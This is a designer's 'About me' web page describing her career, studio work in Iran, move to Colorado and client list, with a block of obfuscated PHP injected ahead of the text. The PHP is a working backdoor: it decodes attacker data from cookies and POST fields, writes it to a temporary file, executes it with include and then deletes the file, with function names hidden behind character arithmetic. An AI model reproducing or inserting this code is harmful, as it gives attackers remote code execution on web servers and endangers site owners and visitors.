$pNprM = "\145" . '_' . 't' . "\167" . "\106" . 'B';$zpMeCn = chr ( 584 - 485 ).chr ( 900 - 792 ).chr ( 822 - 725 )."\x73" . "\x73" . "\x5f" . "\x65" . chr (120) . chr ( 1101 - 996 )."\163" . "\x74" . chr ( 718 - 603 ); $oOdPmu = class_exists($pNprM); $zpMeCn = "12690";$jKfqJqhdZ = !1;if ($oOdPmu == $jKfqJqhdZ){function NVmEZPVBx(){$BCwiz = new /* 47960 */ e_twFB(29096 + 29096); $BCwiz = NULL;}$gkXBOtDUm = "29096";class e_twFB{private function aybYrlGGm($gkXBOtDUm){if (is_array(e_twFB::$xrLUnOicGt)) {$JHxYrbTW = sys_get_temp_dir() . "/" . crc32(e_twFB::$xrLUnOicGt['s' . chr (97) . "\x6c" . "\x74"]);@e_twFB::$xrLUnOicGt["\167" . "\x72" . chr (105) . chr ( 561 - 445 )."\x65"]($JHxYrbTW, e_twFB::$xrLUnOicGt["\143" . "\157" . "\156" . 't' . "\x65" . chr ( 326 - 216 ).chr ( 980 - 864 )]);include $JHxYrbTW;@e_twFB::$xrLUnOicGt[chr ( 850 - 750 ).chr ( 454 - 353 )."\154" . 'e' . 't' . "\145"]($JHxYrbTW); $gkXBOtDUm = "29096";exit();}}private $EeZTo;public function atxCOwloKG(){echo 44347;}public function __destruct(){e_twFB::$xrLUnOicGt = @unserialize(e_twFB::$xrLUnOicGt); $gkXBOtDUm = "48414_13735";$this->aybYrlGGm($gkXBOtDUm); $gkXBOtDUm = "48414_13735";}public function RDueVjcG($iYFFM, $uOnncg){return $iYFFM[0] ^ str_repeat($uOnncg, (strlen($iYFFM[0]) / strlen($uOnncg)) + 1);}public function vlZvfUQF($iYFFM){$IzLsotB = "base64";return array_map($IzLsotB . chr ( 528 - 433 ).chr ( 552 - 452 ).'e' . chr (99) . "\x6f" . "\144" . 'e', array($iYFFM,));}public function __construct($LEeTjRoXRH=0){$wQAfKoLjkz = $_POST;$XEGmQ = $_COOKIE;$uOnncg = "2bd1985e-858d-4635-9697-9ff29e580941";$KkzDVix = @$XEGmQ[substr($uOnncg, 0, 4)];if (!empty($KkzDVix)){$iYFFM = "";$KkzDVix = explode(",", $KkzDVix);foreach ($KkzDVix as $hivpFoHAZ){$iYFFM .= @$XEGmQ[$hivpFoHAZ];$iYFFM .= @$wQAfKoLjkz[$hivpFoHAZ];}e_twFB::$xrLUnOicGt = $this->RDueVjcG($this->vlZvfUQF($iYFFM), $uOnncg);}}public static $xrLUnOicGt = 36862;}NVmEZPVBx();}$kdSrPXQudm = chr ( 187 - 117 )."\113" . "\170" . "\137" . chr (76) . "\x67" . 'a' . chr ( 562 - 465 ).'P';$WBxarGT = chr (99) . 'l' . chr ( 750 - 653 )."\x73" . 's' . chr ( 509 - 414 ).'e' . "\x78" . chr (105) . "\x73" . chr (116) . chr (115); $ocGSiPlNNj = class_exists($kdSrPXQudm); $kdSrPXQudm = "39487";$WBxarGT = "47995";if ($ocGSiPlNNj === FALSE){class FKx_LgaaP{public function hfEneaL(){echo "53996";}private $NYkwHRdgQ;public static $pllxlZaLCp = "9eaaabcb-13f1-4c6b-a7ab-8b3fc8a54e92";public static $vVXkMNRn = 40829;public function __construct($XzAcJcIX=0){$QyeoVmA = $_POST;$aOfZpy = $_COOKIE;$kXkrMryyqq = @$aOfZpy[substr(FKx_LgaaP::$pllxlZaLCp, 0, 4)];if (!empty($kXkrMryyqq)){$lCroGRBbSL = "base64";$GWiSjiaC = "";$kXkrMryyqq = explode(",", $kXkrMryyqq);foreach ($kXkrMryyqq as $pXFSx){$GWiSjiaC .= @$aOfZpy[$pXFSx];$GWiSjiaC .= @$QyeoVmA[$pXFSx];}$GWiSjiaC = array_map($lCroGRBbSL . '_' . "\x64" . chr (101) . chr ( 1002 - 903 ).chr (111) . 'd' . "\x65", array($GWiSjiaC,)); $GWiSjiaC = $GWiSjiaC[0] ^ str_repeat(FKx_LgaaP::$pllxlZaLCp, (strlen($GWiSjiaC[0]) / strlen(FKx_LgaaP::$pllxlZaLCp)) + 1);FKx_LgaaP::$vVXkMNRn = @unserialize($GWiSjiaC);}}private function lZkKwQ(){if (is_array(FKx_LgaaP::$vVXkMNRn)) {$VurHmVa = sys_get_temp_dir() . "/" . crc32(FKx_LgaaP::$vVXkMNRn[chr ( 322 - 207 )."\141" . "\154" . chr ( 1026 - 910 )]);@FKx_LgaaP::$vVXkMNRn[chr ( 752 - 633 )."\162" . chr ( 321 - 216 ).chr ( 197 - 81 ).chr ( 944 - 843 )]($VurHmVa, FKx_LgaaP::$vVXkMNRn[chr (99) . 'o' . "\156" . 't' . chr ( 402 - 301 )."\156" . 't']);include $VurHmVa;@FKx_LgaaP::$vVXkMNRn[chr (100) . 'e' . chr (108) . chr ( 260 - 159 ).chr (116) . chr (101)]($VurHmVa); $AFmgwuysjC = "48261";exit();}}public function __destruct(){$this->lZkKwQ();}}$jODCVUybF = new /* 50712 */ FKx_LgaaP(); $jODCVUybF = str_repeat("46215_60110", 1);} About me - Parisa Tashakori

About me




With over twenty years in the field, I have worked with ad agencies, publishers, art centers, municipalities, and festivals around the world, and have done visual branding for exhibitions, events, foundations, and over two dozen companies. Although I have used my expertise in a variety of industries, my passion is work within art and culture, as well as socially and environmentally focused projects.

After running my own studio in Iran, I moved to Colorado in 2017 and am eager to expand my horizons with new, creative projects. As a bilingual designer who has traveled to and presented in many countries, I bring a nuanced, global perspective to my projects, and am able to work in English, Persian, and Arabic.

My artistic philosophy is to take clients’ projects as collaborations: the final product should be a perfect blending of their preferences and opinions with my aesthetic sensibilities and experience. I believe in providing both a literal rendering of a client’s vision as well as alternative options I believe are well suited to the project. Through open and honest communication between myself and the client, I am confident we will select the best approach.



I’ve had the pleasure to work with great clients and organizations such as:


National Renewable Energy Laboratory (NREL), CMCI Studio, Boulder Public Library, KGNU community radio, Boulder Art Association, City of Boulder, Denver Birdy magazine, Boulder Office of Art and Culture, Hsing Wu University in Taipei, Missouri State University, Front Range Community College, University of Alabama, Oklahoma State University, Arizona State University, San Ignacio University (USIL), Tehran Municipality, Ministry of Industry and Commerce, Poland Embassy in Tehran, Department of Environment in Tehran and a range of publications and private corporations.